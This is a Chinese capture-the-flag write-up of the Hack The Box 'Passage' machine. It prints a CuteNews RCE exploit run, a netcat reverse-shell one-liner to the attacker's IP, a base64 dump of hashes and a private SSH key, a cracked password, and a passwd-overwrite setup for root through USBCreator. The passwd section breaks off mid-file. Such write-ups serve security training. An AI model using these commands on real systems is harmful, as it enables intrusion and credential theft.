Passage-htb-writeup

0x00 靶场技能介绍

章节技能：WEB页面目录分析、CVE-2019-11447、WEB服务数据库枚举、bash脚本编写、sha256加密破解、账号密码复用、ssh秘钥复用、某个sudo绕过漏洞

参考链接：https://0xdf.gitlab.io/2021/03/06/htb-passage.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.206

2、扫描下开放端口情况

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.206 tcp                             
[sudo] kali 的密码：
开始对 10.10.10.206 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.206" -oG "10.10.10.206"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 16:10 CST
Nmap scan report for 10.10.10.206
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 11.04 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,80," "10.10.10.206"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 16:10 CST
Nmap scan report for 10.10.10.206
Host is up (0.37s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Passage News
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.32 seconds

3、目前只开放了2个端口，现在访问下80端口看看

http://10.10.10.206/

4、首页第一个文章提示了一些信息

由于异常大量的交通，我们已经在我们的网站上实施Fail2Ban.请注意，过度访问我们的服务器将被禁止使用您的IP地址。虽然我们不希望锁定我们的合法用户，但为了确保安全的观看体验，这一决定是必要的。当您浏览我们广泛的新闻选择时，请谨慎行事。查看和评论 

5、通过查看网站底部的信息，我们知道了这个是 CuteNews 系统，并且链接到了他的源码地址，通过查看github，可以发现这是一个很老的系统了，没有更新和维护了

Powered by CuteNews

https://github.com/CuteNews/cutenews-2.0

6、通过在页面上检索，发现了http://10.10.10.206/CuteNews/rss.php路径地址，然后在访问时 http://10.10.10.206/CuteNews/ 时，页面显示是一个登录界面，还有版本信息

7、下面注册一个账号进行登录查看下

http://10.10.10.206/CuteNews/?register

test:test

http://10.10.10.206/CuteNews/index.php

8、其实这里可以发现当前CMS的版本信息

CuteNews v2.1.2

9、搜索下这个版本的漏洞情况

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit CuteNews 2.1.2
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                                                              | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                                                  | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                                                      | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                                                    | php/webapps/48800.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/48800.py 
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
    Codes: CVE-2019-11447
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/48800.py

10、这里下载这个远程命令执行的漏洞，发现了一个亮点，和github上一个的评论的版本一致

11、这里先绑定下hosts，这个地址是在前台和后台都看到的

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.206 passage.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.206 passage.htb

12、开始尝试利用这个漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ python3 48800.py

           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/


[->] Usage python3 expoit.py

Enter the URL> http://10.10.10.206
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: fN34nPPzK0 and password: fN34nPPzK0

=======================================================
Sending Payload
=======================================================
signature_key: d3895d20c2d2191e0f5ad06472a27e97-fN34nPPzK0
signature_dsi: 1b72189238f74644dade998b6be6f053
logged in user: fN34nPPzK0
============================
Dropping to a SHELL
============================

command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

command > 

13、这里漏洞可以正常利用，那就构造一个反弹shell吧

command > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.8 443 >/tmp/f   

14、成功获取到第一个初始的shell环境

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.206] 49008
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ 

www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$

15、通过查看 /home 目录，发现存在2个用户，且都没有权限查看

www-data@passage:/var/www/html/CuteNews/uploads$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root  root  4096 Jul 21  2020 .
drwxr-xr-x 23 root  root  4096 Jul 21  2020 ..
drwxr-x--- 17 nadav nadav 4096 Jan 12 00:07 nadav
drwxr-x--- 16 paul  paul  4096 Sep  2  2020 paul
www-data@passage:/var/www/html/CuteNews/uploads$ 

16、通过不断的在网站目录下翻文件，终于翻到一些信息

www-data@passage:/var/www/html/CuteNews/cdata$ cd users
cd users
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
09.php  21.php  5d.php  6e.php  7a.php  b0.php  d4.php  f6.php  lines
0a.php  32.php  66.php  71.php  8f.php  bf.php  d5.php  f9.php  users.txt
16.php  52.php  6d.php  77.php  97.php  c8.php  d6.php  fc.php
www-data@passage:/var/www/html/CuteNews/cdata/users$ 
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat 09.php
cat 09.php
<?php die('Direct call - access denied'); ?>
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO31zOjQ6Im5hbWUiO2E6MTp7czo0OiJ0ZXN0IjthOjY6e3M6MjoiaWQiO3M6MTA6IjE3MDUwNDc5NzEiO3M6NDoibmFtZSI7czo0OiJ0ZXN0IjtzOjM6ImFjbCI7czoxOiI0IjtzOjU6ImVtYWlsIjtzOjExOiJ0ZXN0QHFxLmNvbSI7czo0OiJuaWNrIjtzOjQ6InRlc3QiO3M6NDoicGFzcyI7czo2NDoiOWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOCI7fX19www-data@passage:/var/www/html/CuteNews/cdata/users$ 

17、通过解码发现发现了一些账号信息，且这个账号就是我注册的账号信息

a:2:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}s:4:"name";a:1:{s:4:"test";a:6:{s:2:"id";s:10:"1705047971";s:4:"name";s:4:"test";s:3:"acl";s:1:"4";s:5:"email";s:11:"test@qq.com";s:4:"nick";s:4:"test";s:4:"pass";s:64:"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08";}}}

18、通过查看 lines 文件信息，发现一堆base64的编码的信息

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat lines
cat lines
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg4MzQwNzkiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3Nwd3ZndWp3LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
www-data@passage:/var/www/html/CuteNews/cdata/users$

19、然后对这个目录进行密码的破解，发现了这个文件，由于我bash脚本编写的水平较差，我也不想直接写了，就参考演练报告直接用了他的方法

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat lines | grep -v "php die" | while read line; do decode=$(echo $line | base64 -d); email=$(echo $decode | grep -Po '\w+@\w+\.\w+'); hash=$(echo $decode | grep -Po '\w{64}'); if [ -n "$hash" ]; then echo "$email:$hash"; fi; done
< grep -Po '\w{64}'); if [ -n "$hash" ]; then echo "$email:$hash"; fi; done  
nadav@passage.htb:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
sid@example.com:4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
kim@example.com:f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
egre55@test.com:4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
www-data@passage:/var/www/html/CuteNews/cdata/users$ 

20、这个其中好像就有目标用户的密码

paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

21、这里使用一个在线的密码破解网站 https://crackstation.net/ 进行破解，成功破解出密码

Hash	Type	Result
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd	sha256	atlanta1

22、这里开启切换用户，进行登录

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~
cd ~
paul@passage:~$ ls
ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ id
id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:~$ 

23、获取到第一个flag信息

paul@passage:~$ cat user.txt
cat user.txt
d85694c762ac2c6b059cc178cef21434

0x02 系统权限获取

24、通过初始的枚举，当前用户是没有sudo权限的，为了接下来方便枚举，这里读取下ssh秘钥，通过ssh登录下系统

paul@passage:~$ ls -la /home/nadav
ls -la /home/nadav
ls: cannot open directory '/home/nadav': Permission denied
paul@passage:~$ cd .ssh
cd .ssh
paul@passage:~/.ssh$ ls
ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
paul@passage:~/.ssh$ base64 id_rsa
base64 id_rsa
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBczE0ckhCUmxk
NWZVOW9MMXpwSWZjUGdhVDU0UmIrUURqMm9BSzRNMWc1UGJsS3UvCitMK0pMczdLUDVRTDBDSU5v
R0doQjVRM2FhbmZZQW1BTzdZTytqZVVTMjY2QnFnT2o2UGRVT3ZUMEduUzdNNGkKWjJMcG00UXBZ
RHl4cmdZOU9tQ2c1TFNOMjZQeDk0OFdFMTJONUh5RkNxTjFoWjZGV1lrNXJ5aXc1QUpUdi9rdApy
V0VHdThESlhra2ROYVQrRlJNY1QxdU1RMzJ5NTU2ZmN6bEZRYVhRakI1ZkpVWFlLSURrTGhHblVU
VWNBblNKCkpqQkdPWG4xZDJMR0hNQWNIT29mMlFlTHZNVDhoOThoWlFUVWV5UUE1SisyUlo2M2Iw
NGR6bVBwQ3hLK2hib2sKc2poRm9YRDhtNURPWWNYUy9ZSHZXMXEza256UXRkZHRxcXVQWFFJREFR
QUJBb0lCQUd3cU1ITUpkYnJ0NjdZUQplV3p0djFvZnM3WXBpemhmVnlwSDhQeE1icHYvTVI1eGlC
M1lXMERINFR6LzZUUEZKVlIvSzExbnF4YmtJdGxHClFYZEFyYjJFZ01BUWNNd00wbU1hblI3c1o5
bzV4c0dZK1RSQmVNQ1lyVjdrbXYxbnM4cWRkTWtXZktsa0wwbHIKbHhOc2ltR3NHWXExMGV3WEVU
RlNTRi94ZU9LMTVocDVyendad3JtSTlObzRGRnJYNlAwcjdyZE9heHN3U0ZBaAp6V2QxR2hZayta
M3FZVWhDRTBBeEh4cE0wRGxOVkZySXdjMERuTTVqb2dPNkpEeEhrelhhRFVqL0Ewam5qTU16ClIw
QXlQL0FFdzdIbXZjclNvRlJ4NmsvTnR6YWVQeklhMkN1R0Rrei9HNk9FaE5WZDJTOC9lbmx4ZjUx
TUlPL2sKN3UxZ0I3MENnWUVBMXpMR0EzNUoxSFc3SWNnT0s3bTJIR01kdWVNNEJYOHo4R3JQSWs2
TUxaNnc5WDZ5b0JpbwpHUzNCM25nT0t5SFZHRmVRcnB3VDFhL2N4ZEVpOHlldFhqOUZKZDd5ZzJr
SWV1RFBwK2dtSFpoVkhHY3dFNkM0Ckl1VnJxVWd6NEZ6eUgxWkZnMzdlbWJ2dXRrSUJ2M0ZWeUY3
UlJxRlgvNnk2WDFWYnRrN2tYc01DZ1lFQTFXQkUKTHVoUkZNRGFFSWRmQTE2Q290UnV3d3BRUy9X
ZVo4UTVsb09qOStobTd3WUN0R3BiZFM5dXJESGFNWlVIeXNTUgpBSFJGeElUcjRTYmk1MUJIVXNu
d0h6SlowbzZ0UkZNWGFjTjkzZzNZMmJUOXlaMnpqOWt3R00yNXlTaXpFV0gwClZ2UEtlUllNbEdu
WHFCdkpvUkU0M3dkUWFQR1lnVzJiajZZbHQxOENnWUJSelNzWUNObG51Wmo0cm1NMG05TnQKMXY5
bHVjbUJ6V2lnNnZqeHdZbm5qWHNXMXFKdjJPK05JcWVmT1dPcFlhTHZMZG9CaGJMRWQ2VWtUT3RN
SXJqMApLbmpPZklFVEVzbjJhNTZENU9zWU5OK2xmRlA2SWczY3RmakcwSHRudmUwTG5HK3dISG5o
Vmw3WFNTQUE5Y1AxCjlwVDJsRDR2SWlsMk02dzVFS1Flb1FLQmdRQ01NczE2R0xFMXRxVlJXUEVI
OExCYk5zTjBLYkdxeHo4R3BUckYKZDhkajIzTE91SjlNVmRtei9LOTJPdWRIenNrbzVORDFnSEJh
K0k5WUI4bnMvS1Z3Y3pqdjlwQm9OZEVJNUtPcwpuWU4xUkpub0tmRGE2V0NUTXJ4VWY5QURxVmRI
STVwOUM0Qk00VHp3d3o2c3VWMVpGRXpPMWlweVdkTy9ydm9ZCmY2Mm1kd0tCZ1FDQ3ZqOTZsV3k0
MVVvZmM4eTY1Q0ppMTI2TSs5T0VsYmhza1JpV2xCM09JRGI1MW1iU1lneU0KVXh1N1Q4SFkyQ2NX
aUtHZStURVg2bXc5VkZ4YU95aUJtOFJlU0M3U2syMUdBU3k4S2dxdGZaeTdwWkd2YXpEcwpPUjN5
Z3BLczA5eXU3c3ZRaThqMnF3YzdGTDZERVI3NHl3cytmNTM4aEk3U0hCdjlmWVBWeXc9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
paul@passage:~/.ssh$ 


┌──(kali㉿kali)-[~/桌面]
└─$ echo LS0tLS1CRUdJTi...........SU0EgUFJJVkFURSBLRVktLS0tLQo=  | base64 -d > id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa  

┌──(kali㉿kali)-[~/桌面]
└─$ ssh paul@10.10.10.206 -i id_rsa        
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ED25519 key fingerprint is SHA256:BD7E5sbGZ+avx6QQcDrb9FWVVlbulHrgseaqsAQrvC4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.206' (ED25519) to the list of known hosts.
paul@passage:~$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:~$ 

25、这里其实在读取秘钥的时候，发现了一个信息，秘钥好像和另一个用户是共用的

paul@passage:~$ cd .ssh
paul@passage:~/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
paul@passage:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~/.ssh$

在信息搜集中，发现了当前 paul 下的 ssh 秘钥认证中存在 nadav@passage 标识，疑似秘钥公用，尝试下

26、开始尝试登录下，是否可以登录另一个用户

┌──(kali㉿kali)-[~/桌面]
└─$ ssh nadav@10.10.10.206 -i id_rsa    
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$ 

27、同样的当前账号也没法看sudo的情况，通过枚举，发现这里的漏洞有点超纲了，我不会做 = =！

28、下面跟着演练报告走吧

USB创建器
Palo Alto 的 Unit42 于 2019 年 7 月发表的一篇博客文章显示了他们在 USBCreator D-Bus 接口中发现的一个缺陷：

允许访问 sudoer 组中用户的攻击者绕过 sudo 程序施加的密码安全策略。该漏洞允许攻击者以 root 身份使用任意内容覆盖任意文件，而无需提供密码。这很容易导致特权提升，例如，通过覆盖影子文件并为 root 设置密码。

D-Bus是一个消息传递系统，是许多 Linux 系统上的核心系统，允许同一系统上运行的进程之间进行通信。该漏洞在于该进程、接口如何错误地允许攻击者触发它以 root 身份执行一些非预期的、任意写入操作。

29、查看根目录下的 .viminfo 信息

nadav@passage:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Last Substitute Search Pattern:
~MSle0~&AdminIdentities=unix-group:root

# Last Substitute String:
$AdminIdentities=unix-group:sudo

# Command Line History (newest to oldest):
:wq
:%s/AdminIdentities=unix-group:root/AdminIdentities=unix-group:sudo/g

# Search String History (newest to oldest):
? AdminIdentities=unix-group:root

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
'1  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# Jumplist (newest first):
-'  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# History of marks within files (newest to oldest):

> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
        "       12      7

> /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
        "       2       0
        .       2       0
        +       2       0
nadav@passage:~$ 

30、开始复制密码用户登录

nadav@passage:~$ cp /etc/passwd passwd
nadav@passage:~$ openssl passwd -1 shiyan
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.
nadav@passage:~$ echo '$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash' >> passwd 
nadav@passage:~$ tail -3 /etc/passwd
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ echo 'shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash' >> passwd 
nadav@passage:~$ tail -3 /etc/passwd
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ tail /etc/passwd
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ ls
Desktop    Downloads  Pictures  Templates  examples.desktop
Documents  Music      Public    Videos     passwd
nadav@passage:~$ cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
